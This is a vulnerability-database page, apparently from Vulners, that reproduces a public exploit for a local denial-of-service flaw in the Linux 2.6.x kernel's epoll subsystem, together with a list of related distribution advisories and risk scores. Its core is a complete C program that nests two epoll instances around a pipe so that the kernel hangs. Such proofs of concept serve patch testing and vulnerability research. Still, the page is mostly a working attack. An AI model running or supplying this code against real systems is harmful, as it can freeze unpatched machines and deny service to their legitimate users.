Linux Kernel 2.6.x - epoll Nested Structures Local Denial of Service
| Reporter | Title | Published | Views | Family All 137 |
|---|---|---|---|---|
| Medium: kernel | 19 Nov 201100:00 | – | amazon | |
| Medium: kernel | 5 Jul 201200:00 | – | amazon | |
| Amazon Linux AMI : kernel (ALAS-2011-22) | 4 Sep 201300:00 | – | nessus | |
| Amazon Linux AMI : kernel (ALAS-2012-100) | 4 Sep 201300:00 | – | nessus | |
| CentOS 6 : kernel (CESA-2012:0862) | 11 Jul 201200:00 | – | nessus | |
| CentOS 5 : kernel (CESA-2012:1061) | 11 Jul 201200:00 | – | nessus | |
| Fedora 14 : kernel-2.6.35.14-103.fc14 (2011-15241) | 7 Nov 201100:00 | – | nessus | |
| Fedora 15 : kernel-2.6.41.1-1.fc15 (2011-15856) | 18 Nov 201100:00 | – | nessus | |
| MiracleLinux 3 : kernel-2.6.18-308.1.AXS3 (AXSA:2012-487:03) | 14 Jan 202600:00 | – | nessus | |
| MiracleLinux 4 : kernel-2.6.32-279.AXS4 (AXSA:2012-749:06) | 14 Jan 202600:00 | – | nessus |
10
/*
source: https://www.securityfocus.com/bid/46630/info
The Linux Kernel epoll Subsystem is prone to multiple local denial-of-service vulnerabilities.
Successful exploits will allow attackers to cause the kernel to hang, denying service to legitimate users.
*/
#include <unistd.h>
#include <sys/epoll.h>
int main(void) {
int e1, e2, p[2];
struct epoll_event evt = {
.events = EPOLLIN
};
e1 = epoll_create(1);
e2 = epoll_create(2);
pipe(p);
epoll_ctl(e2, EPOLL_CTL_ADD, e1, &evt);
epoll_ctl(e1, EPOLL_CTL_ADD, p[0], &evt);
write(p[1], p, sizeof p);
epoll_ctl(e1, EPOLL_CTL_ADD, e2, &evt);
return 0;
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Sep 2016 00:00Current
8.1High risk
Vulners AI Score8.1
CVSS 24.9
EPSS0.00795